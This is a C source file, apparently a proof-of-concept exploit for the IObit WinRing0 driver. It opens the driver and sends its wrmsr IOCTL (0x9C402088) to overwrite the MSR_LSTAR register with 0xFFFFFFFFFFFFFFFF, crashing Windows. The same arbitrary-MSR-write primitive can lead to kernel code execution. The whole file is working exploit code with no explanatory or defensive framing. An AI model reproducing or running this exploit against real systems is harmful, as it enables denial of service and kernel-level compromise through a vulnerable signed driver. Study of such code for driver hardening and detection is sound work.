#include <windows.h>
#include <stdio.h>
typedef unsigned long long QWORD; // DWORD64

DWORD IA32_MSR_LSTAR = 0xC0000082; // MSR_LSTAR 
QWORD pBad = 0xFFFFFFFFFFFFFFFF; // Overwrite data, this will be the value written into MSR_LSTAR. (BSoD on Windows)

int main(int argc, char* argv[]) {
  HANDLE hDriver = CreateFileW(L"\\\\.\\IOBIT_WinRing0_1_3_0", GENERIC_READ | GENERIC_WRITE, 0,
    NULL, OPEN_EXISTING, 0, NULL); // Get a handle to the driver

  if (hDriver != INVALID_HANDLE_VALUE) {
    printf("[i] Found driver\n");
    LPVOID lpInMemoryArea = VirtualAlloc((LPVOID)0x41000000, 0x100, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    if (lpInMemoryArea == NULL) {
      printf("[!!!] Unable to allocate memory\n");
      ExitProcess(-1);
     }
    printf("[i]Allocated memory\n");
    memmove(lpInMemoryArea, &IA32_MSR_LSTAR, sizeof(DWORD));
    memmove((BYTE*)lpInMemoryArea + 0x4, &pBad, sizeof(QWORD));
    DWORD dwIoctl = 0x9C402088; // wrmsr IOCTL
    printf("[i] Sending IOCTL 0x%X\n", dwIoctl);
    DWORD dwBytesOut = 0;
    NTSTATUS dwLastError = DeviceIoControl(hDriver, dwIoctl, lpInMemoryArea, 0x16, NULL, 0x8, &dwBytesOut, NULL); // No output buffer needed
    // nlnInBufferSize is in Bytes (0x16 is needed)
    printf("MSR: 0x%X was written to with: 0x%I64X\n", IA32_MSR_LSTAR, pBad);
  }
  else {
    printf("[!!!] Unable to find driver\n");
    ExitProcess(-1);
  }
  ExitProcess(0);
}